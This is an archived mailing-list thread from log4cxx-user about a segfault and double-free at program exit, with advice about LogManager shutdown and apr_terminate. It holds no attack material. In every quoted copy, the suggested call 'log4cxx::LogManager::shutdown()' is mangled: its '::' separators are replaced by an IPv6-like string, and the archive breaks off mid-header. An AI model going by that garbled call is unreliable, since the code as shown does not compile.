JKHzMCKOt7wIm73rQY7C6i9Ti4/5VCaDkZz2Q= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=oDy65beRxj8h9e4rYtirCXhM115F6p+uYlDI82QyjVJtEQ+8EU2tOYsIgmGYqcm6My +04GfiXV4oWToN6p1He5va8l96TSi/rFKU9funPzhDN9wwZoUdzDTT7MB/B4Gxib+4qx TCBYIB9B6w6Z450Yl4/+Zaz0o9jC2n53lNjSA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l2mr4865501wff.4.1295343846541; Tue, 18 Jan 2011 01:44:06 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 18 Jan 2011 01:44:06 -0800 (PST) In-Reply-To: <[email protected]> References: <20110118001546.04f846d1@frodo> <[email protected]> <[email protected]> Date: Tue, 18 Jan 2011 10:44:06 +0100 Message-ID: <[email protected]> Subject: Re: Crash at exit From: Fabian Jacquet <[email protected]> To: Log4CXX User <[email protected]> Content-Type: multipart/alternative; boundary=000e0cd2da08d5c92f049a1bbd2f --000e0cd2da08d5c92f049a1bbd2f Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I have the same problem if I use log4cxx.AsyncAppender. I fixed the problem by calling log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogManageracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshutdown(); before the end of the process. It's not very clean but it works. On Tue, Jan 18, 2011 at 09:40, Oscar Pernas <[email protected]> wrote: > I had the same problem. In my case, It was caused because log4cxx uses AP= R > libraries, and in my project I was using too. Are you using APR in your > project? are you making a apr_terminate in your code? > > Regards > > 2011/1/18 Thorsten Sch=F6ning <[email protected]> > > Guten Tag Andreas Volz, >> am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie: >> >> > Program received signal SIGSEGV, Segmentation fault. >> > 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D<value optimi= zed >> out>) >> > at /usr/include/log4cxx/helpers/objectptr.h:100 >> > 100 p->releaseRef(); >> >> Sounds that the following may be the reason: >> >> >> http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbox= /%[email protected]%3E >> http://[email protected]/msg03188.htm= l >> >> Mit freundlichen Gr=FC=DFen, >> >> Thorsten Sch=F6ning >> >> -- >> Thorsten Sch=F6ning >> AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig >> >> Telefon: Potsdam: 0331-743881-0 >> E-Mail: [email protected] >> Web: http://www.am-soft.de >> >> AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam >> Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow >> >> > > > -- > =D3scar Pernas Plaza. > --000e0cd2da08d5c92f049a1bbd2f Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I have the same problem if I use log4cxx.AsyncAppender.<br>I fixed the prob= lem by calling log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogManageracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshutdown(); before the end of the proce= ss.<br>It&#39;s not very clean but it works.<br><br><div class=3D"gmail_quo= te"> On Tue, Jan 18, 2011 at 09:40, Oscar Pernas <span dir=3D"ltr">&lt;<a href= =3D"mailto:[email protected]">[email protected]</a>&gt;</span> wrote:<br><block= quote class=3D"gmail_quote" style=3D"margin: 0pt 0pt 0pt 0.8ex; border-left= : 1px solid rgb(204, 204, 204); padding-left: 1ex;"> I had the same problem. In my case, It was caused because log4cxx uses APR = libraries, and in my project I was using too. Are you using APR in your pro= ject? are you making a apr_terminate in your code?<div><br></div><div>Regar= ds<br> <br><div class=3D"gmail_quote">2011/1/18 Thorsten Sch=F6ning <span dir=3D"l= tr">&lt;<a href=3D"mailto:[email protected]" target=3D"_blank">tschoeni= [email protected]</a>&gt;</span><div><div></div><div class=3D"h5"><br><blockquo= te class=3D"gmail_quote" style=3D"margin: 0pt 0pt 0pt 0.8ex; border-left: 1= px solid rgb(204, 204, 204); padding-left: 1ex;"> Guten Tag Andreas Volz,<br> am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie:<br> <div><br> &gt; Program received signal SIGSEGV, Segmentation fault.<br> &gt; 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D&lt;value opt= imized out&gt;)<br> &gt; =A0 =A0 at /usr/include/log4cxx/helpers/objectptr.h:100<br> &gt; 100 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 p-&gt;releaseRef();<br= > <br> </div>Sounds that the following may be the reason:<br> <br> <a href=3D"http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200= [email protected]%3E" target=3D"_blank">http://= mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbox/%3C497515= [email protected]%3E</a><br> <a href=3D"http://[email protected]/msg0= 3188.html" target=3D"_blank">http://www.mail-archive.com/log4cxx-user@loggi= ng.apache.org/msg03188.html</a><br> <br> Mit freundlichen Gr=FC=DFen,<br> <br> Thorsten Sch=F6ning<br> <br> --<br> Thorsten Sch=F6ning<br> AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig<br> <br> Telefon: Potsdam: 0331-743881-0<br> E-Mail: =A0<a href=3D"mailto:[email protected]" target=3D"_blank">tscho= [email protected]</a><br> Web: =A0 =A0 <a href=3D"http://www.am-soft.de" target=3D"_blank">http://www= .am-soft.de</a><br> <br> AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam<br> Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow<br> <br> </blockquote></div></div></div><br><br clear=3D"all"><br>-- <br>=D3scar Per= nas Plaza.<br> </div> </blockquote></div><br> --000e0cd2da08d5c92f049a1bbd2f-- From [email protected] Tue Jan 18 09:56:37 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88744 invoked from network); 18 Jan 2011 09:56:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 09:56:37 -0000 Received: (qmail 2926 invoked by uid 500); 18 Jan 2011 09:56:37 -0000 Delivered-To: [email protected] Received: (qmail 2662 invoked by uid 500); 18 Jan 2011 09:56:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 2646 invoked by uid 99); 18 Jan 2011 09:56:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 09:56:33 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-fx0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 09:56:29 +0000 Received: by fxm17 with SMTP id 17so6753366fxm.34 for <[email protected]>; Tue, 18 Jan 2011 01:56:06 -0800 (PST) Received: by 161.129.204.104 with SMTP id k7mr1129439mur.131.1295344566374; Tue, 18 Jan 2011 01:56:06 -0800 (PST) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Tue, 18 Jan 2011 01:55:46 -0800 (PST) In-Reply-To: <[email protected]> References: <20110118001546.04f846d1@frodo> <[email protected]> <[email protected]> <[email protected]> From: Oscar Pernas <[email protected]> Date: Tue, 18 Jan 2011 10:55:46 +0100 Message-ID: <[email protected]> Subject: Re: Crash at exit To: Log4CXX User <[email protected]> Content-Type: multipart/alternative; boundary=0016368e25a5bd90cf049a1be86d --0016368e25a5bd90cf049a1be86d Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I resolved it not calling the apr_terminate method. Log4cxx call it when th= e destructor is called. 2011/1/18 Fabian Jacquet <[email protected]> > I have the same problem if I use log4cxx.AsyncAppender. > I fixed the problem by calling log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogManageracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshutdown(); before th= e > end of the process. > It's not very clean but it works. > > > On Tue, Jan 18, 2011 at 09:40, Oscar Pernas <[email protected]> wrote: > >> I had the same problem. In my case, It was caused because log4cxx uses A= PR >> libraries, and in my project I was using too. Are you using APR in your >> project? are you making a apr_terminate in your code? >> >> Regards >> >> 2011/1/18 Thorsten Sch=F6ning <[email protected]> >> >> Guten Tag Andreas Volz, >>> am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie: >>> >>> > Program received signal SIGSEGV, Segmentation fault. >>> > 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D<value optim= ized >>> out>) >>> > at /usr/include/log4cxx/helpers/objectptr.h:100 >>> > 100 p->releaseRef(); >>> >>> Sounds that the following may be the reason: >>> >>> >>> http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbo= [email protected]%3E >>> http://[email protected]/msg03188.ht= ml >>> >>> Mit freundlichen Gr=FC=DFen, >>> >>> Thorsten Sch=F6ning >>> >>> -- >>> Thorsten Sch=F6ning >>> AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig >>> >>> Telefon: Potsdam: 0331-743881-0 >>> E-Mail: [email protected] >>> Web: http://www.am-soft.de >>> >>> AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam >>> Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow >>> >>> >> >> >> -- >> =D3scar Pernas Plaza. >> > > --=20 =D3scar Pernas Plaza. --0016368e25a5bd90cf049a1be86d Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable <meta http-equiv=3D"content-type" content=3D"text/html; charset=3Dutf-8">I = resolved it not calling the apr_terminate method. Log4cxx call it when the = destructor is called.<br><br><div class=3D"gmail_quote">2011/1/18 Fabian Ja= cquet <span dir=3D"ltr">&lt;<a href=3D"mailto:[email protected]">fab= [email protected]</a>&gt;</span><br> <blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p= x #ccc solid;padding-left:1ex;">I have the same problem if I use log4cxx.As= yncAppender.<br>I fixed the problem by calling log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogManageracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshutdow= n(); before the end of the process.<br> It&#39;s not very clean but it works.<div><div></div><div class=3D"h5"><br>= <br><div class=3D"gmail_quote"> On Tue, Jan 18, 2011 at 09:40, Oscar Pernas <span dir=3D"ltr">&lt;<a href= =3D"mailto:[email protected]" target=3D"_blank">[email protected]</a>&gt;</span= > wrote:<br><blockquote class=3D"gmail_quote" style=3D"margin:0pt 0pt 0pt 0= .8ex;border-left:1px solid rgb(204, 204, 204);padding-left:1ex"> I had the same problem. In my case, It was caused because log4cxx uses APR = libraries, and in my project I was using too. Are you using APR in your pro= ject? are you making a apr_terminate in your code?<div><br></div><div> Regards<br> <br><div class=3D"gmail_quote">2011/1/18 Thorsten Sch=F6ning <span dir=3D"l= tr">&lt;<a href=3D"mailto:[email protected]" target=3D"_blank">tschoeni= [email protected]</a>&gt;</span><div><div></div><div><br><blockquote class=3D"g= mail_quote" style=3D"margin:0pt 0pt 0pt 0.8ex;border-left:1px solid rgb(204= , 204, 204);padding-left:1ex"> Guten Tag Andreas Volz,<br> am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie:<br> <div><br> &gt; Program received signal SIGSEGV, Segmentation fault.<br> &gt; 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D&lt;value opt= imized out&gt;)<br> &gt; =A0 =A0 at /usr/include/log4cxx/helpers/objectptr.h:100<br> &gt; 100 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 p-&gt;releaseRef();<br= > <br> </div>Sounds that the following may be the reason:<br> <br> <a href=3D"http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200= [email protected]%3E" target=3D"_blank">http://= mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbox/%3C497515= [email protected]%3E</a><br> <a href=3D"http://[email protected]/msg0= 3188.html" target=3D"_blank">http://www.mail-archive.com/log4cxx-user@loggi= ng.apache.org/msg03188.html</a><br> <br> Mit freundlichen Gr=FC=DFen,<br> <br> Thorsten Sch=F6ning<br> <br> --<br> Thorsten Sch=F6ning<br> AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig<br> <br> Telefon: Potsdam: 0331-743881-0<br> E-Mail: =A0<a href=3D"mailto:[email protected]" target=3D"_blank">tscho= [email protected]</a><br> Web: =A0 =A0 <a href=3D"http://www.am-soft.de" target=3D"_blank">http://www= .am-soft.de</a><br> <br> AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam<br> Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow<br> <br> </blockquote></div></div></div><br><br clear=3D"all"><br>-- <br>=D3scar Per= nas Plaza.<br> </div> </blockquote></div><br> </div></div></blockquote></div><br><br clear=3D"all"><br>-- <br>=D3scar Per= nas Plaza.<br> --0016368e25a5bd90cf049a1be86d-- From [email protected] Tue Jan 18 12:47:48 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78964 invoked from network); 18 Jan 2011 12:47:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 12:47:48 -0000 Received: (qmail 53514 invoked by uid 500); 18 Jan 2011 12:47:48 -0000 Delivered-To: [email protected] Received: (qmail 53227 invoked by uid 500); 18 Jan 2011 12:47:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 53218 invoked by uid 99); 18 Jan 2011 12:47:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 12:47:45 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=MIME_QP_LONG_LINE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO encopim.encopim) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 12:47:40 +0000 Received: (qmail 11325 invoked by uid 33); 18 Jan 2011 13:47:17 +0100 Received: from 161.129.204.104 ([161.129.204.104]) by webmail.encopim.com (Horde MIME library) with HTTP; Tue, 18 Jan 2011 13:47:17 +0100 Message-ID: <[email protected]> Date: Tue, 18 Jan 2011 13:47:17 +0100 From: [email protected] To: [email protected] Subject: Re: Crash at exit References: <20110118001546.04f846d1@frodo> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; DelSp="Yes"; format="flowed" Content-Disposition: inline Content-Transfer-Encoding: quoted-printable User-Agent: Internet Messaging Program (IMP) H3 (4.1.4) I had a similar problem, after exit(0): *** glibc detected *** ./main: double free or corruption (out): 0x08f10b20 *= ** =3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D /lib/i686/cmov/libc.so.6[0xb7356624] /lib/i686/cmov/libc.so.6(cfree+0x96)[0xb7358826] /usr/lib/libstdc++.so.6(_ZdlPv+0x21)[0xb75472e1] /usr/local/lib/liblog4cxx.so.10(_ZN7log4cxx6LoggerD0Ev+0xfd)[0xb77c48dd] /usr/local/lib/liblog4cxx.so.10(_ZNK7log4cxx7helpers10ObjectImpl10releaseRef= Ev+0x37)[0xb77d8a07] /usr/local/lib/liblog4cxx.so.10(_ZNK7log4cxx6Logger10releaseRefEv+0x22)[0xb7= 7c1b62] ./main(_ZN7log4cxx7helpers10ObjectPtrTINS_6LoggerEED1Ev+0x24)[0x804ea84] /usr/local/lib/liblog4cxx.so.10(_ZNSt8_Rb_treeISsSt4pairIKSsN7log4cxx7helper= s10ObjectPtrTINS2_6LoggerEEEESt10_Select1stIS7_ESt4lessISsESaIS7_EE8_M_erase= EPSt13_Rb_tree_nodeIS7_E+0x32)[0xb77ad062] /usr/local/lib/liblog4cxx.so.10(_ZN7log4cxx9HierarchyD0Ev+0x40)[0xb77aaee0] /usr/local/lib/liblog4cxx.so.10(_ZNK7log4cxx7helpers10ObjectImpl10releaseRef= Ev+0x37)[0xb77d8a07] /usr/local/lib/liblog4cxx.so.10(_ZNK7log4cxx9Hierarchy10releaseRefEv+0x22)[0= xb77a9052] /usr/local/lib/liblog4cxx.so.10(_ZN7log4cxx3spi25DefaultRepositorySelectorD0= Ev+0x53)[0xb77cbaf3] /usr/local/lib/liblog4cxx.so.10(_ZNK7log4cxx7helpers10ObjectImpl10releaseRef= Ev+0x37)[0xb77d8a07] /usr/local/lib/liblog4cxx.so.10(_ZNK7log4cxx3spi25DefaultRepositorySelector1= 0releaseRefEv+0x22)[0xb7788a52] /usr/local/lib/liblog4cxx.so.10[0xb77cab6f] /lib/i686/cmov/libc.so.6(exit+0x89)[0xb7316ab9] /lib/i686/cmov/libc.so.6(__libc_start_main+0xed)[0xb72fe45d] ./main[0x804bc91] =3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D ----------------------------------------------------------------------- I tried different things, I call 'apr_terminate ()' from log4cxx, call =20 'LogManageracf:4db6:5e0b:f386:43a5:35d7:718d:3c8b shutdown ()' just before the exit (0) and Apply this: =20 http://old.nabble.com/Fix-possible =20 -crash-on-exit-when-using-static-Loggers-td19473591.html Anyone have any idea? thanks in advance Quoting Oscar Pernas <[email protected]>: > I resolved it not calling the apr_terminate method. Log4cxx call it when t= he > destructor is called. > > 2011/1/18 Fabian Jacquet <[email protected]> > >> I have the same problem if I use log4cxx.AsyncAppender. >> I fixed the problem by calling log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogManageracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshutdown(); before th= e >> end of the process. >> It's not very clean but it works. >> >> >> On Tue, Jan 18, 2011 at 09:40, Oscar Pernas <[email protected]> wrote: >> >>> I had the same problem. In my case, It was caused because log4cxx uses A= PR >>> libraries, and in my project I was using too. Are you using APR in your >>> project? are you making a apr_terminate in your code? >>> >>> Regards >>> >>> 2011/1/18 Thorsten Sch=C3=B6ning <[email protected]> >>> >>> Guten Tag Andreas Volz, >>>> am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie: >>>> >>>> > Program received signal SIGSEGV, Segmentation fault. >>>> > 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D<value optim= ized >>>> out>) >>>> > at /usr/include/log4cxx/helpers/objectptr.h:100 >>>> > 100 p->releaseRef(); >>>> >>>> Sounds that the following may be the reason: >>>> >>>> >>>> http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbo= [email protected]%3E >>>> http://[email protected]/msg03188.ht= ml >>>> >>>> Mit freundlichen Gr=C3=BC=C3=9Fen, >>>> >>>> Thorsten Sch=C3=B6ning >>>> >>>> -- >>>> Thorsten Sch=C3=B6ning >>>> AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig >>>> >>>> Telefon: Potsdam: 0331-743881-0 >>>> E-Mail: [email protected] >>>> Web: http://www.am-soft.de >>>> >>>> AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam >>>> Amtsgericht Potsdam HRB 21278 P, Gesch=C3=A4ftsf=C3=BChrer: Andreas Muc= how >>>> >>>> >>> >>> >>> -- >>> =C3=93scar Pernas Plaza. >>> >> >> > > > -- > =C3=93scar Pernas Plaza. > --=20 Carlos Jim=C3=A9nez ENCOPIM S.L. C/. del Parc 5 (nau 13), P.I. Els Pinetons E-08291 RIPOLLET (Barcelona) Tel: +1-620-806-9604 Fax: +1-620-806-9604 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D La informaci=C3=B3n contenida en la presente transmisi=C3=B3n es confidencia= l y su uso =C3=BAnicamente est=C3=A1 permitido a su(s) destinatario(s). Si Ud. no e= s la persona destinataria de la presente transmisi=C3=B3n, rogamos nos lo comunique de manera inmediata por tel=C3=A9fono +1-620-806-9604) y destruya cualquier copia de la misma (tanto digitales como en papel). The information contained in this transmission is confidential and is intended only for the use of the addressee(s). If you are not the designated recipient of this transmission, please advise us immediately by telephone +1-620-806-9604) and destroy any copies (digital and paper). =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D From [email protected] Tue Jan 18 13:10:18 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93859 invoked from network); 18 Jan 2011 13:10:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 13:10:18 -0000 Received: (qmail 97056 invoked by uid 500); 18 Jan 2011 13:10:18 -0000 Delivered-To: [email protected] Received: (qmail 96755 invoked by uid 500); 18 Jan 2011 13:10:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 96742 invoked by uid 99); 18 Jan 2011 13:10:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 13:10:14 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.am-soft.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 13:10:07 +0000 Envelope-To: [email protected] Received: from tschoening-nb.potsdam.am-soft.de (p578bc5dd.dip0.t-ipconnect.de [161.129.204.104]) by mail.am-soft.de (Postfix) with ESMTP id 1EF666B5 for <[email protected]>; Tue, 18 Jan 2011 14:09:46 +0100 (CET) Date: Tue, 18 Jan 2011 14:09:48 +0100 From: =?utf-8?Q?Thorsten_Sch=C3=B6ning?= <[email protected]> Organization: AM-SoFT IT-Systeme X-Priority: 3 (Normal) Message-ID: <[email protected]> To: "Log4CXX User" <[email protected]> Subject: Re: Crash at exit In-Reply-To: <[email protected]> References: <20110118001546.04f846d1@frodo> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Guten Tag [email protected], am Dienstag, 18. Januar 2011 um 13:47 schrieben Sie: > Anyone have any idea? Don't call apr_terminate at all, uncomment it in Log4cxx. Mit freundlichen Gr=C3=BC=C3=9Fen, Thorsten Sch=C3=B6ning --=20 Thorsten Sch=C3=B6ning AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig =20 Telefon: Potsdam: 0331-743881-0 E-Mail: [email protected] Web: http://www.am-soft.de AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam Amtsgericht Potsdam HRB 21278 P, Gesch=C3=A4ftsf=C3=BChrer: Andreas Muchow From [email protected] Tue Jan 18 13:45:58 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4557 invoked from network); 18 Jan 2011 13:45:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 13:45:58 -0000 Received: (qmail 49535 invoked by uid 500); 18 Jan 2011 13:45:58 -0000 Delivered-To: [email protected] Received: (qmail 49261 invoked by uid 500); 18 Jan 2011 13:45:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 49253 invoked by uid 99); 18 Jan 2011 13:45:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 13:45:54 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=MIME_QP_LONG_LINE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO encopim.encopim) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 13:45:48 +0000 Received: (qmail 14237 invoked by uid 33); 18 Jan 2011 14:45:26 +0100 Received: from 161.129.204.104 ([161.129.204.104]) by webmail.encopim.com (Horde MIME library) with HTTP; Tue, 18 Jan 2011 14:45:26 +0100 Message-ID: <[email protected]> Date: Tue, 18 Jan 2011 14:45:26 +0100 From: [email protected] To: [email protected] Subject: Re: Crash at exit References: <20110118001546.04f846d1@frodo> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; DelSp="Yes"; format="flowed" Content-Disposition: inline Content-Transfer-Encoding: quoted-printable User-Agent: Internet Messaging Program (IMP) H3 (4.1.4) X-Virus-Checked: Checked by ClamAV on apache.org When I said he called a 'aprterminate ()' wanted to _not_ called =20 'aprterminate ()', which had commented on log4cxx thanks Quoting Thorsten Sch=C3=B6ning <[email protected]>: > Guten Tag [email protected], > am Dienstag, 18. Januar 2011 um 13:47 schrieben Sie: > >> Anyone have any idea? > > Don't call apr_terminate at all, uncomment it in Log4cxx. > > Mit freundlichen Gr=C3=BC=C3=9Fen, > > Thorsten Sch=C3=B6ning > > -- > Thorsten Sch=C3=B6ning > AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig > > Telefon: Potsdam: 0331-743881-0 > E-Mail: [email protected] > Web: http://www.am-soft.de > > AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam > Amtsgericht Potsdam HRB 21278 P, Gesch=C3=A4ftsf=C3=BChrer: Andreas Muchow > > --=20 Carlos Jim=C3=A9nez ENCOPIM S.L. C/. del Parc 5 (nau 13), P.I. Els Pinetons E-08291 RIPOLLET (Barcelona) Tel: +1-620-806-9604 Fax: +1-620-806-9604 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D La informaci=C3=B3n contenida en la presente transmisi=C3=B3n es confidencia= l y su uso =C3=BAnicamente est=C3=A1 permitido a su(s) destinatario(s). Si Ud. no e= s la persona destinataria de la presente transmisi=C3=B3n, rogamos nos lo comunique de manera inmediata por tel=C3=A9fono +1-620-806-9604) y destruya cualquier copia de la misma (tanto digitales como en papel). The information contained in this transmission is confidential and is intended only for the use of the addressee(s). If you are not the designated recipient of this transmission, please advise us immediately by telephone +1-620-806-9604) and destroy any copies (digital and paper). =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D From [email protected] Fri Jan 21 19:58:05 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79762 invoked from network); 21 Jan 2011 19:58:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jan 2011 19:58:05 -0000 Received: (qmail 27575 invoked by uid 500); 21 Jan 2011 19:58:05 -0000 Delivered-To: [email protected] Received: (qmail 27461 invoked by uid 500); 21 Jan 2011 19:58:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 27452 invoked by uid 99); 21 Jan 2011 19:58:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) 